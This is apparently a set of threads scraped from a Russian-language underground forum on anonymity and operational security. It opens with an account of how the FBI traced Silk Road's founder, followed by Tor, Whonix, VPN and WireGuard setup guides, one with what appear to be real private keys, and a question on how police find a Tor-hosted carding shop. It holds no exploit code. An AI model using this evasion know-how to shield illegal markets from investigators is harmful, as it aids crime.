Разъяснительная часть процесса деанонимизации

c15169c614b7-article-ulbricht-silk-road- article.png Итак, мы переходим к непосредственному разъяснению сложившейся ситуации. Ежели Вам не было интересно читать художественную вариацию, то оставлю здесь пару ремарок о ситуации, про которую будет идти речь.

Что такое Silk Road?

«Кто-то уже слышал о «Шелковом пути»? Это что то вроде анонимного eBay, или Amazon. Я не думаю, что они торгуют тяжелыми веществами, но там все равно достаточно большой ассортимент. В качестве средства подключения, они используют Тор-браузер, а платежным инструментом является Биткоин. Кто-то может высказать свое мнение о проекте?».

Click to expand...

Altoid — 2011, BitcoinTalk

В 2011 году, на самом известном форуме, посвященном криптовалютам (а именно Bitcoin Talk) появилась такого рода запись. Как оказалось, это была первая маркетинговая уловка Росса Ульбрихта, создателя легендарного сайта «Шелкового путь» арестованного ФБР в октябре 2013 года. Впоследствии он был осужден и приговорен к пожизненному заключению. Silk Road был создан в 2011 году как «скрытый» сервис, доступ к которому возможен только через Tor. Проект Tor ( «Луковый маршрутизатор») позволяет скрыть трафик пользователя в Интернете, заставляя соеденение проходить через ряд специальных маршрутизаторов — несколько слоев, по примеру обычной луковицы — чтобы сделать невозможным отслеживание IP. Чтобы подключиться, пользователи должны были сначала установить клиент Tor, а затем посетить несколько сайтов с редкими именами (например, одним из самых последних для Silk Road был silkroadfb5piz3r.onion). После процедур пользователь прибывал на простой и удобный в использовании рынок для приобретения запрещенных веществ у продавцов по всему миру. Товар был отправлен напрямую от продавца покупателю, без вмешательства основат еля ресурса. Его единственной связью с транзакцией с наркотиками были деньги, поэтому он использовал биткоин, чтобы усложнить отслеживание.

**Как спецслужбы сумели поймать основателя?

Официальная версия ФБР: **

Untitled design.png

Это была нелегкая задача. Первоначально агенты не могли отследить конечный адрес платежей, не говоря уже о серверах, на которых был расположен Silk Road. Даже несмотря на то, что в их распоряжении был хакер из Anonymous, технической возможности реализовать деанонимизацию не было. Процесс изрядно застопорился, хотя руководство требовало результатов, агенты были полностью бессильны.

Шаг I. Все изменилось, когда нашли человека, первым упомянувшем название площадки в т.н. «клирнете». Было понятно, что раз он был первым, то он либо является автором ресурса, либо кем-то из очень приближенных. Его никнеймом был «Altoid», чья цитата приведена в начале статьи.

Шаг II. Таким образом, они нашли сообщение на сайте shroomery.org, где тема, созданная этим человеком, являлась маркетинговым продвижением Silk Road, и перенаправляла в блог WordPress, где были даны инструкции для доступа к сайту. Запросив ордер, спецгаенты смогли получить доступ к данным, и усумели обнаружить, что блог был создан за 4 дня до публикации темы на форуме.

Шаг III. Полиция продолжала отслеживать действия неизвестной личности, скрывающейся под личиной «Alotid», обнаружив, что на известном форуме ICO- стартапов, Bitcoin Talk, тоже была создана похожая тема. В октябре 2011 года, там объявился Альтоид, который написал, что ищет «технически подкованного человека, способного работать с биткоинами» и попросил всех заинтересованных лиц отправить электронное письмо на адрес «rossulbricht@gmail.com». Google, американская корпорация, всегда славилась тем, что раскрывала всевозможные данные представителям спецслужб. И даже на этот раз, после получения соотвествующего ордера, в корпорации наплевали на конфеденциальность. Запрос в Google позволил агентам выяснить, что учетная запись была зарегистрирована под именем Росс Ульбрихт, и что, в свою очередь, она была связана с профилем Google+, который содержал фотографию потенциального основателя или администратора и ссылку на его любимые видео на YouTube. (прим. активная ссылка) Специалисты были уверены, что они на правильном пути, ведь большая часть видеороликов, и опубликованный статей, как раз соотвествовала взглядам «Ужасного Пирата Робертса» (прим. никнейм Роса Ульбрихта на площадке Silk Road)

Шаг VI. Тщательно анализуря деятельность Росса в социальных сетях, агенты, шаг за шагом, наткыались на всевозможные упомянания о взглядах Роса, которые всецело соответствовали убеждениям его потенциального альтер-эго из теневого сегмента сети. Следующим немаловажным шагом, стала публикация о Silk Road в местечковой газете (прим. The Austin Cut в Остине, где вырос Ульбрихт). В статье, которая была опубликована после анонимного письма, объяснялся процесс создания площадки Шелкового пути, и идейная подоплека, подразумевающая ощущение полной свободы личности, что Автор анонимного письма утверждал, что создание такого рода магазина, полностью прекратило насилие, связанное с покупкой наркотиков. И что перенос торговли в .onion зону, уменьшил кримногоненную обставноку в США.

Шаг IV. Правительственные службы начали пристально следить за Росом, и изучать места, в которых он любит проводить время.

Шаг V. Далее, агенты обнаружили другую подсказку на сайте StackOverflow(веб-ресурс начинающих програмистов, посвященный взаимпопомщи), где Ульбрихт зарегистрировался в 2012 году, чтобы попросить помощи при подключении «к скрытому серверу Tor с помощью php через curl». В запрос он включил несколько строк кода, которые не работали. Чуть позже, осознав, что публикация под собственным именем не была хорошей идеей, Ульбрихт изменил свое имя на «Frоsty» (прим. кликабельная ссылка), после чего изменил еще и адрес электронной почты на frosty@frosty.com.

Spoiler: Заявление агента ФБР, касательно данного шага:

Я поставил в приоритет изучение открытого SSH ключа, которйы содержался на сервере Silk Road,. Он использовался для того, чтобы администратор сайта смог войти со своими правами доступа. У открытого цифрового ключа, концовка тождественна никнейму некого Росса Ульбрихта, в последствии изменившего свой никнейм на форуме програмистов, а именно: «frosty@frosty». Исходя из своего опыта и опыта, я знаю, что ключи шифрования SSH состоят из длинных строк текста. Различные программы SSH генерируют открытые ключи по-разному, но все они генерируют открытые ключи в одинаковом формате с текстовой строкой, которая всегда заканчивается в формате «[user] @ [computer]». Компьютер в этой подстроке - это имя компьютера, который сгенерировал открытый ключ, а пользователь - это имя пользователя, который его создал. На основании моего опыта, это значит, что название учетной записи, и имя компьютера, с которого происходит подключение, является, соотвественно frosty и frosty. На основании социалогических исследований, многие пользователи используют одинаковые никнеймы, практически на всех форумах, электронных ресурсах и даже собственных компьютерах . Следовательно, я считаю, что «Росс Ульбрихт» , пользователь Stack Overflow «Ross Ulbicht», который изменил свое имя на «frosty» и свой электронный адрес на frosty@frosty.com является тем же лицом, что и DPR, являющийся администратором Silk Road, который подключался к веб-серверу Silk Road с компьютера с именем «frosty», на котором имелся аккаунт пользователя «frosty».

Click to expand...

_
Шаг VI. Далее, начинается самый интересный момент. Правительство утверждает, что они сумели обнаружить исходящий трафик по нескольким странам, что вызывает больше вопросв, чем ответов. Веб-сервер Шелкового пути был настроен так, чтобы админитсратору не было надобности вводить логин и пароль при подключении, если система считает сервера, с которых поступал трафик — надеждными. ФБР не делали никаких завялений, касательно Tor, но некоторые считают, что система была взломана, чтобы шпионить за пользователями. Также возможно, что ФБР удалось взломать пароли Шелкового пути, а этого, в принципе, достаточно, чтобы обнаружить IP.

Spoiler: Заявление агента ФБР, касательно данного шага:

На основании имеющегося у меня опыта, я утверждаю, что данные настройки предусматривают задействование ключей шифрования с подключением по протоколу SSH (Secure Shell). Для возможности генерации такого шифрования, перед администратором стоит задача создать два ключа – «открытый», который расположен на сервере, и «закрытый» ключ, который находится на компьютере, с которого и осуществляется подключение к серверу. Как только эти ключи созданы, сервер может узнавать компьютер администратора на основе связи между закрытым ключом администратора и соответствующем ему открытым ключом, хранящемся на сервере.

Click to expand...

_
Шаг VII. Далее, ФБР мистическим образом находит сервера Silk Road. (прим. Якобы, вместо того, чтобы использовать кретсную-фею или взламывать сеть Tor, следователи якобы обнаружили Роса, введя «разные записи» в CAPTCHA сайта, который затем, поскольку он был настроен неправильно, отправил обратно IP- адрес сайта на обычный веб-браузеры. Все это было подробно описано в заявлении от ведущего агента ФБР. Впоследствии множество экспертов тщательно изучили эту серию событий, описав заявление Тарбелла как слишком расплывчатое и предположили, что тактика ФБР, возможно, напоминала нечто более похожее на взлом). Главный сервер находился в стране, которая имеет договор с США о правовой помощи, поэтому ФБР смогло получить больше информации. Там они заметили, что открытый ключ сервера заканчивался на «frosty@frost » и что на сервере использовалась версия кода, опубликованного в StackOverflow.

Spoiler: Заявление агента ФБР, касательно данного шага:

Е сли кто-то создает пару ключей SSH, используя компьютер MyComputer, и пользователь вошел в систему как John, открытый ключ, сгенерированный в результате, закончится подстрокой John @ MyComputer

Шаг VIII. В июле 2013 года, по всей видимости, в ходе обычной проверки таможенные агенты перехватили посылку, прибывающую из Канады, куда направлялись девять поддельных удостоверений личности, все с разными именами, но с использованием фотографии Ульбрихта. Пакет был адресован отслеживаемому адресу в Сан-Франциско.

Шаг IX. Три дня спустя агенты отправились навестить Ульбрихта в его доме в Сан-Франциско. Росс долго отнекивался, но в конце концов, сказал, что его любой сосед, в состоянии купить такие же на Silk Road, и они придут ему по почте.

Шаг XI. На основании фактов, изложенных выше, спецагент запросил ордер на арест Роса, и привелечения его к ответсвенности.

Неофициальная версия:

** Untitled design (1).png

Юридичискеий аспект: **Главный аргумент юриста Ульбрихта Джошуа Дратела заключается в том, что Росса подставило правительство США. Да, звучит весьма конспирологически, но теория имеет право на существование. В начале судебной тяжбы, защита взяла на себя ответственность за создание Silk Road, однако, заявила, что проект был создан в качестве небольшого «экономического эксперимента», который впоследствии был продан. Юрист уверенно заявляет, что Ульбрихт — далеко не Ужасный Пират Робертс, который управлял форумом. И что на самом деле, форум курирует несколько человек, которые совершали преступления, прикрываясь личиной Роса. Его основным аргументом являлось то, что агенты ФБР сами вынудили Роса начать заниматься незаконной деятельностью на веб-ресурсе Silk Road. Он также говорит, что компьютер Росса был взломан и что на нем специально были размещены компрометирующие документы, чтобы дискредитировать личность Росса, и сделать виновным. На что обвинение ответило, что это является "теорией заговора», и не приняла эти факты во внимание.

Технический аспект: Новые подробности включены в документы, опубликованные правительством США, которые были опубликованы в ответ на запросы адвокатов Ульбрихта, требующих, чтобы ФБР предоставило больше информации. Защита хотела узнать, какое программное обеспечение использовалось для регистрации подтверждений того, что посредством CAPTCHA следователю выдало IP-адрес серверов Шелкового пути. Но, согласно ответу ФБР, у агентства не было никакой дополнительной информации, чтобы предоставить данную информацию. Из-за того, как был настроен веб-сайт Шелкового пути — с внешним сервером и внутренним сервером, и только данные первого могут быть доступны второму — это было бы фактически невозможно для кого-то возиться с капчей на странице входа для доступа к внутреннему серверу.

ФБР также предоставило данные трафика с сервера (прим. кликабельная ссылка) Шелкового пути , но опять-таки, вызывает вопросы их внешний вид. Журналы не показывают, что ФБР получает IP-адрес от просочившейся CAPTCHA, а просто дает нам лог страницу конфигурации PHPMyAdmin. Так что теперь возникает другой вопрос. Если ФБР не нашло сервер из-за утечки CAPTCHA, как он нашел страницу PHPMyAdmin?

Роберт Грэм из Errata Security рассказал [об этом в своем блоге](http://blog.erratasec.com/2014/10/reading-silk-road- configuration.html). Он разбирается в технических фактах вокруг доказательств и предполагает, что журналы указывают на что-то еще, возможно, на мониторинг интернет-портов. Если бы ФБР или вспомогательное правительственное агентство, такое как АНБ, контролировали соединения с Исландией и из нее, где оказалось, что страницы администратора размещались, «они могли бы легко найти пароль и использовать его для входа на сервер». Что касается нахождения этой страницы PHPMyAdmin: «Один из способов, которым это можно было бы найти, - это сканирование всего Интернета на наличие SSL-серверов, а затем поиск строки «Silkroad»на полученной веб-странице», — пишет Грэм. Он также говорит, что журналы, представленные в новом свидетельстве, не совпадают со страницами, описанными в декларации Тарбелла.

«Как эксперт в таких темах, как анализ паролей и массовое сканирование Интернета, я знаю, что отслеживание сайта Шелкового пути вполне в силах АНБ», — пишет Грэм. Но обвинение утверждает, что именно ФБР, а не АНБ, нашли сервер.

_Некоторые, включая Грэма, предполагают, что может иметь место дело«параллельной конструкции» — когда доказательства представляются в том виде, в котором они получены одним способом в поддержку судебного дела, но на самом деле получены другими способами._

[мануал] Прокидываем весь трафик через TOR без утечек!

ID: 676533bbb4103b69df37197e
Thread ID: 78902
Created: 2022-12-28T16:53:35+0000
Last Post: 2024-04-17T07:53:45+0000
Author: proxy
Replies: 42 Views: 6K

Привет. Если ты под линуксом то статья не для тебя. Если ты на винде то скорее всего для тебя статья окажется полезной.

Paid content. Purchased: 2.

[Open content for 1.00 $](/purchase/bs_hidebuy/hide- buy?buy_id=1&post_id=545338) Purchase user upgrade "Покупка группы Premium" and view the buy tag without restrictions

Я расскажу как пробросить весь трафик всех необходимых программ (ftp и ssh клиенты, мессенжеры, браузеры) через ТОР, раз и навсегда забыв об утечке трафика, отвалившегося ВПНа, упавшего процесса проксифера, использования порта 9170, кривых фаерволов, утечек ДНС, системных служб и т.д.

0. Устанавливаем VirtualBox

1. Качаем Whonix (для VirtualBox) и импортируем. Далее Качаем Windows 7 и устанавливаем. Должно получиться так:

2. Whonix-Gateway-XFCE будет раздавать интернет внутри локальной сети. Весь трафик идет через TOR. Запускаем её.

3. В настройках сети виртуальной машины Windows 7 выставляем вот так:

4. Запускаем Windows 7 и выставляем в свойствах адаптера так же как на скрине. IPv6 отключаем!

После этого на Windows 7 должен появиться интернет и далее соединение внутри нее будет работать только через сеть ТОР. Все установленные программы будут иметь выход в интернет только через ТОР. ДНС так же идет через ТОР. При обрыве соединения IP никуда не протекает.
Статья простая но кому то точно будет полезной.

Благодари лайками!

Анти-детект браузер (обсуждение, общие вопросы)

ID: 676533bbb4103b69df371a06
Thread ID: 73471
Created: 2022-06-20T11:19:12+0000
Last Post: 2023-09-22T23:23:33+0000
Author: Giuzeppe_hard
Replies: 85 Views: 6K

Какой анти-детект браузер выбрать? Требуется >10 профилей, switch не подходит (сервер постоянно лежит), есть ли более менее свежие антидетекты? Можно бесплатный, можно крякнутый.

Major opsec failure made by Pompompurin

ID: 676533bbb4103b69df371a11
Thread ID: 84431
Created: 2023-03-24T16:52:41+0000
Last Post: 2023-09-05T17:03:31+0000
Author: stderr
Replies: 82 Views: 6K

I am actually shocked in seeing this and couldn't wait to share with all of you. Pompompurin was a total mess when it came to opsec and don't take my word for it. The below image proves it

**For everyone who are curious, it 's in the indictment which can be found here

https://storage.courtlistener.com/recap/gov.uscourts.vaed.535542/gov.uscourts.vaed.535542.2.0.pdf

RU
Для моих российских друзей это скриншот из обвинительного документа RaidForums, в котором говорится, что: «Записи Raidforums содержат следующий разговор между помпомпурином и всемогущим в ноябре 2020 года или около него, в котором помпомпурин специально упоминает всемогущему, что он искал адрес электронной почты conorfitzpatrick02@gmail.com и имя conorfitzpatrick в базе данных взломанных данных от ai.type».**

Обход блокировки TOR 2021

ID: 676533bbb4103b69df371b42
Thread ID: 60012
Created: 2021-12-13T12:10:56+0000
Last Post: 2022-02-17T23:58:05+0000
Author: j0mbrade
Prefix: Статья
Replies: 41 Views: 6K

Обход блокировки TOR 2021

Всем Асап. Как вы знаете в России начали массово блокировать TOR. У провайдеров установили специальное аппаратное обеспечение, чтобы пользователи не могли подключиться к системе onion.

Итак давайте к делу.

1. Идем и качаем whonix https://www.whonix.org/
Я качал XFCE версию, она имеет интерфейс в отличие от терминальной.
2. Импортируем файлы в приложение для создания виртуальных машин. У меня это Oracllle VM VirtuualBox.
3. Получаем 2 машины. Идем и смотрим настройки сети и делаем так чтобы первый адаптер в сети был NAT. Второй был во внутренний сети и назывался Whonix. Так будет по умолчанию, но все же вы убедитесь.
4. Врубаем сначала Gateway. Пароль и логин по умолчанию можем не менять как многие пишут. Логинимся и смотрим наш Ifconfig.
5. Начинаем настраивать подсоединение к Tor. Окно появится само но если не появилось напишите whonixcheck. Жмем configure и запрашиваем мост который мы знаем. По идее нас должно не пустить, но ключевое решение обмана провайдера состоит в том, что мы должны взять мост из браузера TOR для вашей оссновной OS. У меня это Windows.
6. Открываем тор на основной системе и запрашиваем там мост. Настройки -> TOR -> use a bridge -> Request a bridge from torproject.org. После чего копируем мост в whonix gateway.
7. В настройках вашей основной операционной системы ставим адаптер внутренний (Whonix)
8. Теперь включаем нашу вторую машину с другой системой. Workstation можно не трогать. У меня вторая система это Kali Linux. Теперь самое интересное. Идем в /etc/resolv.conf и ставим nameserver 10.152.152.10. Это ip gateway машины.
9.Теперь отредактируем файл /etc/network/interfaces, пишем в терминале:
nano /etc/network/interfaces
В конец дописываем:
auto eth0
iface eth0 inet static
address 10.152.152.16
netmask 255.255.192.0
gateway 10.152.152.10

В моем случае я мог взять любой новый Айпи адрес для kali. От 0 до 18. Я выбрал 16. Сохраняем и выходим.

10.Идем настраивать вручную wired подключение. По идее это делать не следует если вы все правильно сделали до этого, но это поможет если вы где-то ошиблись. Нажимаем лкм на рабочем столе значок справа в верхнем углу около времени. Edit connections -> wired connection 1 -> IPv4 Settings. Выбираем Manual настройку. И прописываем в адрес вашей машины 10.152.152.16 (или же в конце любую другую цифру от 1 до 18). Главное чтобы совпадало с тем что вы написали в текстовом файле 9 шаге. Прописываем маску. Ее можно взять из Gateway машины написав ifconfig. И в gateway ставим 10.152.152.10. Т.е Айпи адрес Gateway машины. В DNS прописываем тоже 10.152.152.10. Кликаем Save и все.

Вот и все. Дело сделано и теперь вы можете наслаждаться анонимным интернетом в на kali или любой вашей системе. Да есть и небольшие минусы в виде "костылей" в настройках сети, но без этого никуда.

Создание собственного VPN сервера без логирования за $1

ID: 676533bbb4103b69df371b79
Thread ID: 51980
Created: 2021-05-20T11:56:05+0000
Last Post: 2021-11-29T15:46:00+0000
Author: binrs
Prefix: Статья
Replies: 34 Views: 6K

Дабл (и более) VPN даст вам фору (только на пару дней) скрыться.

Spoiler: Пример ситуации Double VPN

Подключились вы к Недерландам, затем к Польше.
Дают запрос провайдерам РФ — кто подключался к Польше в это время? Провайдеру это не видно.
Почему? Потому что наш провайдер видит только подключение к Нидерландам, но не видит подключения к Польше.
Почему они все же вас найдут?
Потому что любой IP адрес, принадлежит провайдеру. А он в свое время ведет логи и видит кто куда подключался.
После связываются с провайдером IP Польши, узнают кто держит сервер, дают ему запрос и провайдер Польши сообщит о подключении Нидерландов, вот вас уже и нашли.

В данной статье будут описаны инструменты для самого дешевого впн без логирования.
Берем любой сервер (с доступом к ssh), или же покупаем. Стоимость валотируется от 50 рублей (в РФ), зарубежные чуть дороже.

Для сервера ОС не значительна, но проще всего настраивать систему через линуксоподобные

Пример будет показан, как был установлен ВПН через убунту.

Ubuntu/Debian - apt install CentOS - yum install Arch - Pacman -S Fedora - Dnf -y

Подключаться к серверу можно через putty.

Вводим команды в терминале:

Code:Copy to clipboard

cd /home
apt install git
git clone https://github.com/Nyr/openvpn-install.git

Code:Copy to clipboard

cd /openvpn-install
chmod +x ./openvpn-install.sh
./openvpn-install.sh

После выполнения команд откроется окно конфига:
Первый пункт выбираем 2.
Во втором и третьем - enter
В 4 пункте указываем название конфига - исход: .ovpn

Убираем логирование командой:
apt remove rsyslog

После нам нужно скачать наш готовый конфиг, можно через FileZilla.
Директория файла root/home/ .ovpn

Устанавливаем OpenVPN: https://openvpn.net/download-open-vpn
После запускаем наш конфиг .ovpn
Логинимся в нем под данными от сервера

Совет: так же выбирайте доверенный сервер, который вас не сольет, потому-что они тоже ведут логи о вас, но это уже другая история.

Wireguard VPN. Быстрая настройка

ID: 676533bbb4103b69df371b7c
Thread ID: 36677
Created: 2020-04-23T09:29:05+0000
Last Post: 2021-11-23T12:21:45+0000
Author: mainnick
Prefix: Статья
Replies: 19 Views: 6K

Детально описывать что такое Wireguard я не стану. В интернете написано много. Вкратце скажу, что это новый, модный, молодежный VPN, который считается достаточно надежным, быстрым и легко настраиваемым. Про первые два я ничего не скажу, а вот то что VPN настраивется очень легко я и собираюсь показать дальше.

Для начала необходимо настроить сервер Wireguard. Сервер можно настроить на домашнем ПК, роутере или на выделеном VPS. В этом примере я покажу настройку Wireguard сервера на бесплатном Amazon AWS с установленой Ubuntu 18.04 и клиентом под Android телефон.

---------------
Настройка сервера:

Добавляем официальный репозиторий Wireguard (если у вас Ubuntu версии выше чем 19.04 - этот пункт можно пропустить):

Code:Copy to clipboard

~$ sudo add-apt-repository ppa:wireguard/wireguard

Обновляем систему:

Code:Copy to clipboard

~$ sudo apt update
~$ sudo apt full-upgrade

Настраиваем часовой пояс на системе, чтобы правильно отображались логи:

Code:Copy to clipboard

~$ sudo dpkg-reconfigure tzdata

Устанавливаем заголовки ядра:

Code:Copy to clipboard

~$ sudo apt install linux-headers-$(uname -r)

Устанавливаем сервер Wireguard:

Code:Copy to clipboard

~$ sudo apt install wireguard

Генерируем приватный и публичный ключи для сервера Wireguard:

Code:Copy to clipboard

~$ wg genkey | tee server_private_key | wg pubkey > server_public_key

Генерируем приватный и публичный ключи для мобильного клиента:

Code:Copy to clipboard

~$ wg genkey | tee mobile_client_private_key | wg pubkey > mobile_client_public_key

Создаем и редактируем файл настройки Wireguard сервера wg0.conf:

Code:Copy to clipboard

~$ sudo nano /etc/wireguard/wg0.conf

В этот файл записываем следущее:

[Interface]
Address = 192.168.40.1
SaveConfig = false
PrivateKey = < вставьте приватный ключ для серевера>
PostUp = iptables -A FORWARD -i %i -j ACCEPT; iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE; ip6tables -A FORWARD -i %i -j ACCEPT; ip6tables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
PostDown = iptables -D FORWARD -i %i -j ACCEPT; iptables -t nat -D POSTROUTING -o eth0 -j MASQUERADE; ip6tables -D FORWARD -i %i -j ACCEPT; ip6tables -t nat -D POSTROUTING -o eth0 -j MASQUERADE
ListenPort = 51820

[Peer]
PublicKey = < вставьте публичный ключ для телефона>
AllowedIPs = 192.168.40.2

Click to expand...

Всё что выделено жирным - настраиваем под себя
Сохраняем файл: Ctrl+S --> Ctrl+X

Делаем из системы маршрутизатор:

Code:Copy to clipboard

~$ sudo sysctl -w net.ipv4.ip_forward=1

Поднимаем Wireguard сервер:

Code:Copy to clipboard

~$ sudo wg-quick up wg0

Проверяем, что интерфейс wg0 поднялся и ждет клиентов:

Code:Copy to clipboard

~$ sudo wg

Добавляем в автозапуск, чтоб после перезагрузки системы сервер поднимался автоматически:

Code:Copy to clipboard

~$ sudo systemctl enable wg-quick@wg0.service

Всё! Вот так просто мы настроили серверную часть Wireguard.

---------------
Настройка клиента Wireguard на Adnroid телефоне:

Для телефона на Android устанавливаем соответствующий клиент в официальном Маркете.
Открываем приложение, далее нажимаем на "плюс" -->
И выбираем заранее подготовленый файл mobile.conf

Файл должен содержать следущее:

[Interface]
PrivateKey = < вставьте приватный ключ для телефона>
Address = 192.168.40.2
DNS = 1.1.1.1

[Peer]
PublicKey = < вставьте публичный ключ от сервера>
AllowedIPs = 0.0.0.0/0
Endpoint = < ipv4 адрес вашего сервера>:51820
PersistentKeepalive=25

Click to expand...

Всё что выделено жирным - настраиваем под себя

На этом всё!

---------
В дополнение:

Настройка минимальной защиты сервера в виде firewall:

Code:Copy to clipboard

~$ sudo apt install ufw
~$ sudo ufw default deny incoming
~$ sudo ufw default allow outgoing
~$ sudo ufw allow 22/tcp # порт для ssh
~$ sudo ufw allow 51820/udp # порт для Wireguard
~$ sudo ufw enable
~$ sudo ufw status

Под спойлером файлы wg0.conf и mobile.conf с примером под мой сервер:

[CLIKE]wg0.conf

[Interface]
Address = 192.168.40.1
SaveConfig = false
PrivateKey = CFqnSuedJj6sTCXRoyqbg94LULgVYcPKgHuzRb6+lHI=
PostUp = iptables -A FORWARD -i %i -j ACCEPT; iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE; ip6tables -A FORWARD -i %i -j ACCEPT; ip6tab$
PostDown = iptables -D FORWARD -i %i -j ACCEPT; iptables -t nat -D POSTROUTING -o eth0 -j MASQUERADE; ip6tables -D FORWARD -i %i -j ACCEPT; ip6t$
ListenPort = 51820

[Peer]
PublicKey = 20li/aIdExkf+FMOxMa1kOo+6xj3U+RG23LKOtRo2j4=
AllowedIPs = 192.168.40.2

Click to expand...

mobile.conf

[Interface]
PrivateKey = 8FpUTMO5h16GZRgdUznbb7JUCOdXMiKeuMAwh+enXEg=
Address = 192.168.40.2
DNS = 1.1.1.1

[Peer]
PublicKey = YWXNRGQJEIbMU0qoFLzzd2cGasRMbZKm4rAqTAoy7D0=
AllowedIPs = 0.0.0.0/0
Endpoint = 3.120.31.125:51820
PersistentKeepalive=25

Click to expand...

[/CLIKE]

Не забываем! Несмотря на то что весь трафик теперь идет через ваш сервер - DNS запросы по прежнему ходят в открытую, и ваш провайдер по прежнему видит адреса сайтов на которые вы заходите.

Как накроют твой TOR-сервис

ID: 676533bbb4103b69df371b91
Thread ID: 50663
Created: 2021-04-14T19:20:36+0000
Last Post: 2021-10-17T13:42:54+0000
Author: Dexter DeShawn
Replies: 39 Views: 6K

Приветствую господа!
Небольшое предисловие:

Имеем основную машину, на которой установлена виртуальная Kali Linux в среде VMware.
На основной машине установлен VPN, а на виртуальной Kali поднят TOR-сервер для интернет-магазина (автошопа).
Автошоп серьёзный и масштабный, так скажем притягивающий внимание "ненужных лиц", интерес этих лиц - это определить местонахождение сервера и предотвратить деятельность автошопа.

ВОПРОС:
Как (какими способами) могут определить местонахождение TOR-сервера с автошопом на борту?

Njalla - Приватный регистратор доменных имен

ID: 676533bbb4103b69df371be9
Thread ID: 40364
Created: 2020-08-03T07:08:15+0000
Last Post: 2021-06-12T15:08:22+0000
Author: R3SET
Prefix: Статья
Replies: 19 Views: 6K

**Сайт -NJALLA _

Njalla

Njalla — Considered the worlds most notorious &quote;Privacy as a Service&quote; provider for domains, VPS' and VPNs.

njal.la njal.la

_Njalla, была запущена соучредителем Pirate Bay Питером Сундом
Njalla помогает сохранять детали регистрации доменных имен частными, регистрируя домены от своего имени.
Нужен только e-mail или jabber.
Оплата в Криптовалюте**

Как тебя посадят?

ID: 676533bbb4103b69df371bed
Thread ID: 52396
Created: 2021-06-01T18:35:03+0000
Last Post: 2021-06-03T07:15:06+0000
Author: temshikmgimo
Prefix: Статья
Replies: 36 Views: 6K

Hola! А вот и первая пробная статья на юридическую тему, повторюсь, в идеале хочу сделать целый раздел на форуме, на котором будем разбирать юридические моменты и повышать не только тех грамотность, но и в юриспруденции прокачивать свой мозг. Но как показала практика без вашей активности уважаемые форумчане никуда, так что: предлагайте, критикуйте, ведь чем больше обсуждения данного направления , тем больше и качественнее материала будет у нас на площадке. Данная статья будет вводной и я её разобью на 4 части, в них разберём УК РФ 28: 272/273/274/274ч.1

Приятного прочтения!)

Ну начнём! Основополагающим международным нормативным актом в сфере компьютерных технологий является Конвенция о компьютерных преступлениях СДСЕ №185, открытая к подписанию в Будапеште 23/11/2001. Данная Конвенция стала первым в истории международным договором о преступлениях, совершаемых посредством сети Интернет и иных коммуникационных сетей. Она устанавливает принципы уголовной ответственности за нарушение авторского права, за мошенничество с использованием ЭВМ, за детскую пopнoгрaфию, а также за нарушение безопасности компьютерных сетей. Приоритетная цель Конвенции состоит в определении общей политики в сфере уголовного права, направленной на защиту общества от компьютерных преступлений.

На настоящий момент Конвенция ратифицирована 30 странами из числа членов Совета Европы, а также США. Стоит отметить, что в число подписантов Конвенции вошли страны СНГ: Азербайджан, Армения, Молдавия, Украина, а также «бывшие союзные Республики» Латвия, Литва и Эстония. Российская Федерация несколько раз рассматривала вопрос о подписании Конвенции, но отрицательное решение, как следует из сообщений официальных информационных агентств, было принято из-за несогласия российских спецслужб предоставить иностранным правоохранительным органам возможность технического перехвата российского интернет-трафика.

УК РФ 28.

На данный момент существуют три тенденциозных направления противодействия высокотехнологичным преступлениям, в частности:

Техническое. Разработка антивирусных программ, резервирование данных, защита от несанкционированного доступа к компьютерным системам.
Организационное. Назначение ответственных лиц, принятие политики безопасности, наличие плана действий – восстановление после сбоя/заражения/выхода из строя.
Правовое. Предусматривает разработку норм, устанавливающих ответственность за преступления в сфере компьютерной информации, совершенствование гражданского и уголовного законодательства, а также защиту авторских прав граждан на программы (сегменты программ) ЭВМ.

Результатом разработки уголовного законодательства является специальная глава 28 УК РФ «Преступления в сфере компьютерной информации». Преступления, содержащиеся в данной главе, представляют собой деяния, природа которых кроется не в использовании самой электронно-вычислительной техники, а использования ее в качестве средства для совершения преступлений.

Эти преступления посягают на неприкосновенность интеллектуальной собственности, неприкосновенность частной жизни и т.п. Поэтому глава 28 «Преступления в сфере компьютерной информации» определена в раздел IX «Преступления против общественной безопасности и общественного порядка».

(Продолжение в следующей статье)

Настраиваем браузер для анонимности на базе Firefox Часть 1

ID: 676533bbb4103b69df371bf1
Thread ID: 43944
Created: 2020-11-05T10:19:42+0000
Last Post: 2021-05-30T22:09:08+0000
Author: hw18
Prefix: Мануал/Книга
Replies: 20 Views: 6K

Здравствуйте мои маленькие любители кибер-экстримизма. Очень долго искал информацию по всем интернетам как же настроить свой браузер, что-бы он выдавал о тебе как можно меньше информации. Буду делать это на примере Firefox, так как считаю его самым адекватным.
ПРЕДУПРЕЖДАЮ:

1. Все дальнейшие действия не дают вам 100% гарантии, что большой брат вас не найдет, но тем неменее мы существенно усложним ему задачу)

2. Статья будет содержать множество букав так, что если вы не готовы напрягать свой ЦП или RAM то не стоит сюда лезть.

3. Статья предназначенна больше для scr1ptkIdD3 нежели для опытных пользователей но если опытные люди смогут найти что-то полезное или дополнить эту статью буду очень рад и благодарен)

После того как мы все выяснили процитирую одного известного персонажа ютуба "Ну че народ погнали йухан"

ЧАСТЬ I - ковыряем конфигурацию браузера about:config

Стоило бы конечно начать с того как настроить вашу сеть но я думаю, на форуме существует масса информации как пускать свой трафик через ToR но статья не об этом поэтому этот момент я упущу. Весь люд даже тот который считает себя "опытным" "продвинутым" или вообще "ИТ богами" зачастую юзают свой браузер прямо из коробки не парясь о насройках от слова "совсем", ставят VPN прямо в браузер и думают что их никто не найдет так вот йух.

В любом деле главное не ссать и все тчательно обдумать!

И так : открывам наш браузер и вписываем нашу заветную фразу

Code:Copy to clipboard

about:config

Соглашаемся принимать все риски на себя и видим огромную кучу каракуль на бусурманском языке
Будучи еще школяром я всегда отшучивался от преподов и стариков мол "Английский учить - врагу служить!" так вот не будте бакланами вроде меня, учите!

Перво наперво заизолируем собственные домены - это фича притянутая командой Mozilla из браузера Tor.

"Что же она делает и н@хуR ее вообще трогать?"-спросите вы.

